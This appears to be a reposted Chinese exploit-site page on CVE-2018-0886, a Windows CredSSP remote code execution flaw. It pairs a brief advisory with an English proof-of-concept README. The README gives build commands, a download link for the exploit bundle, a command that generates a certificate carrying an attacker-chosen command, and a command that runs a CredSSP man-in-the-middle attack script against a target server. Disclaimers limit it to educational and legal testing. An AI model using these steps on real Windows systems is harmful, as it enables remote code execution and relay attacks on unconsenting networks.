Microsoft CredSSP CVE-2018-0886远程执行代码漏洞

作者:抢占风险:关键

CVE:CVE-2018-0886 0day:远程执行代码

Exploit-id:Exploit-00886日期:2018-04-14

介绍

Microsoft Windows Server 2008 SP2和R2 SP1,Windows 7 SP1,Windows 8.1和RT 8.1,Windows Server 2012和R2,Windows 10 Gold,1511,1687,1703和1709中的凭证安全支持提供程序协议(CredSSP)Windows Server 2016由于CredSSP在身份验证过程中验证请求的方式(即“CredSSP远程执行代码漏洞”),1709版本允许存在远程执行代码漏洞。

Exploit

# credssp

This is a poc code for exploiting CVE-2018-0886. It should be used for educational purposes only.
It relies on a fork of the rdpy project(https://github.com/preempt/rdpy), allowing also credssp relay. 


Written by Eyal Karni, Preempt 
ekarni@preempt.com 

# Build

## Instructions (Linux)
If you are using Ubuntu 14 , check the install file.. 
It was tested on Ubuntu 16.04. 

$ git clone https://github.com/preempt/rdpy.git rdpy
$ git clone https://github.com/preempt/credssp.git
$ cd credssp/install
$ sh install.sh
$ cd ../../rdpy
$ sudo python setup.py install


EDB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44453.zip * It assumes a pretty clean inital state. Best to uninstall first relevant compontants such as cryptography,pyopenssl maybe (pip uninstall cryptography). * A different version of openssl needed to be installed for this to run successfully. The install script does that. * Please follow the instructions in the described order. # Running the exploit Export a certificate suitable for Server Authentication from any domain. To generate a suitable certificate for the command to execute :

$ python credssp/bin/gen_cmd.py -c ExportedCert -o exploitc.pem -k exploitk.pem CMD


(exploitc.pem ,exploitk.pem are the generated certificate and private key respectively) To run the attack script:

$ python /usr/local/bin/rdpy-rdpcredsspmitm.py -k exploitk.pem -c exploitc.pem TargetServer


More details are in the usage section of the scripts(--help).

以上内容来源于网络,只提供合法测试用途。
请勿用于非法用途,否则后果自负.


转载请注明出处:https://www.freearoot.com/index.php/microsoft-credssp-cve-2018-0886%E8%BF%9C%E7%A8%8B%E6%89%A7%E8%A1%8C%E4%BB%A3%E7%A0%81%E6%BC%8F%E6%B4%9E/

文章来源:https://0day.asia/microsoft-remote-code-execution-exploit